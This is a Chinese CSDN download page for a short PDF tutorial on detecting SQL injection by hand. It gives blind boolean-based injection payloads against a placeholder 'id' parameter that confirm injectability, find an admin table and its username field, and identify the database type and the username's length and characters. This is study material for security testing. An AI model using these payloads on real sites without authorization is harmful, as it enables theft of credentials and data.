SQL注入手工检测sql注入检测_sql注入手工检测方法资源-CSDN下载

5星 · 超过95%的资源需积分: 44 69 浏览量 2010-04-21 16:16:32 上传评论 1 收藏 65KB PDF 举报

### SQL注入手工检测详解 #### 一、SQL注入概述 SQL注入是一种常见的Web应用程序安全漏洞，攻击者通过向Web应用程序提交恶意SQL语句，利用这些语句与后端数据库进行交互，进而获取敏感数据或执行非法操作。手工检测SQL注入是识别系统中是否存在此类型漏洞的重要手段之一。 #### 二、手工检测SQL注入步骤 ##### 1. 检测可否注入我们需要确定Web应用是否易受SQL注入攻击。可以通过在URL参数中添加SQL语句来测试这一点。如果Web应用对这些输入没有正确处理，则可能存在漏洞。 **示例**： ``` http://url/xx?id=1111;and;1=1; ``` 如果该请求返回正常页面，则表明服务器可能未对输入进行过滤。接下来，我们可以进一步测试： ``` http://url/xx?id=1111;and;1=2; ``` 如果返回一个错误页面，这表明服务器确实将输入作为SQL查询的一部分进行了处理，存在SQL注入的可能性。 ##### 2. 检测表段一旦确定存在SQL注入漏洞，下一步是尝试找出受影响的表名。这通常涉及构造SQL查询来查找表的存在性。 **示例**： ``` http://url/xx?id=1111;and;exists;(select * from admin); ``` 如果此请求返回正常页面，则可以推断“admin”表可能存在。 ##### 3. 检测字段检测表中的具体字段可以帮助我们进一步了解可以获取哪些信息。这一步骤类似于检测表段，但目标更加明确。 **示例**： ``` http://url/xx?id=1111;and;exists;(select username from admin); ``` 如果该请求返回正常页面，则表明“admin”表中可能包含“username”字段。 ##### 4. 检测ID 对于具有唯一标识符的表（如用户表），检测特定的ID可以帮助验证特定用户的记录是否存在。 **示例**： ``` http://url/xx?id=1111;and;exists;(select id from admin where ID=1); ``` 如果返回正常页面，则表明ID为1的记录可能存在。 ##### 5. 检测长度为了进一步收集信息，检测字段的长度有助于确定后续攻击的策略。 **示例**： ``` http://url/xx?id=1111;and;exists;(select id from admin where len(username)=5 and ID=1); ``` 如果返回正常页面，则表示ID为1的用户名长度为5。 ##### 6. 检测数据库类型不同的数据库管理系统（DBMS）支持不同的函数和语法，因此确定使用的DBMS对于构造有效的SQL注入攻击至关重要。 **示例**（检测是否为MSSQL数据库）： ``` http://url/xx?id=1111;and;exists;(select * from sysobjects); ``` 如果返回正常页面，则可能使用的是MSSQL数据库。 ##### 7. 检测字符编码检测数据库中存储的数据的编码格式对于确定如何构造SQL查询至关重要。 **示例**（检测是否为英文）： ``` (ACCESS数据库) http://url/xx?id=1111;and;exists;(select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1); (MSSQL数据库) http://url/xx?id=1111;and;exists;(select id from admin where unicode(sub(username,1,1)) between 30 and 130 and ID=1); ``` 这些示例展示了如何根据不同数据库类型（ACCESS与MSSQL）检测字符串的第一个字符是否为英文字母。 #### 三、总结通过上述步骤，我们可以系统地检测Web应用程序是否存在SQL注入漏洞，并逐步深入挖掘更多有用的信息。需要注意的是，在实际操作过程中，还需要考虑到各种不同的因素，比如不同数据库类型的差异、Web应用的具体实现细节等。此外，了解常见的SQL函数及其用法对于成功执行SQL注入攻击至关重要。在实施任何攻击之前，请确保拥有合法权限或者是在合法授权的环境下进行测试。

资源详情

资源评论

资源推荐

sql注入检测:手工检测可否注入的大致经过

疯狂代码 http://CrazyCoder.cn/ ĵ:http:/CrazyCoder.cn/Security/Article72618.html

□ ;检测可否注入 ;

; ;

http://url/xx?id=1111 ;and ;1=1 ;(正常页面) ;

http://url/xx?id=1111 ;and ;1=2 ;(出错页面) ;

; ;

□ ;检测表段 ;

; ;

http://url/xx?id=1111 ;and ;exists ;(select ;* ;from ;admin) ; ;

; ;

□ ;检测字段 ;

; ;

http://url/xx?id=1111 ;and ;exists ;(select ;username ;from ;admin) ; ;

; ;

□ ;检测ID ;

; ;

http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;ID=1) ;

; ;

□ ;检测长度 ;

; ;

http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;len(username)=5 ;and ;ID=1) ; ;

; ;

□ ;检测长度 ;

; ;

http://url/xx?id=1111 ;and ;exists ;(select ;id ;from ;admin ;where ;len(username)=5 ;and ;ID=1) ; ;

; ;

□ ;检测是否为MSSQL数据库 ;

; ;

http://url/xx?id=1111 ;and ;exists ;(select ;* ;from ;sysobjects) ;

本内容试读结束，登录后可阅读更多

下载后可阅读完整内容，剩余2页未读，立即下载

tuiking

2014-01-06

挺好用的赞

SQL注入手工检测sql注入检测

评论1

sql注入检测

手工检测注入点

sql注入检测工具

SQL注入检查工具

SQL注入之如何检测与判断详细过程

SQL注入漏洞扫描检测

sql注入测试安全工具

web测试之安全测试方法：sql注入方法

SQL注入检测

手工sql注入

SQL注入之Access注入 （手工）

SQL注入法攻击--手工注入

SQL手工注入大全：包含各种类型的SQL注入，实现手工注入的乐趣，此资源你值得拥有。

SQL手工注入完全篇

SQL手工注入学习机

网站初级SQL手工注入

sql注入助手，手工注入的好工具

SQL手工注入辅助工具

SQL手工注入实例

《SQL手工注入笔记》

SQL注入之Access注入（手工）